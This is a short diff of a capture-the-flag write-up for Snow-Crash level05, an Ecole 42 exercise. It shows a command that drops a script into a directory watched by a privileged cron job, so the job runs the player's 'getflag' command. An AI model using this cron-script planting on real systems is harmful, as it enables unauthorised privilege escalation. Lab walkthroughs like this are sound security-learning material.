adrih1/Ecole42/Snow-Crash/level05/Ressources/solve.md

 -bash: /usr/sbin/openarenaserver: Permission denied
 ```

-We cannot excute the openarenaserver ourself, so a cron must be doing it.
-In fact after a certain period of time our file is gone.
+We cannot excute the openarenaserver ourself, but after a certain period of time our file is gone.
+Maybe a CRON executed it.

 ```bash
 $ ls /opt/openarenaserver/

 ```
 Let's right the output of getflag in a file so we can retrieve it after the cron executed it.

 ```bash
 $ echo "getflag > /tmp/flagg" > /opt/openarenaserver/script.sh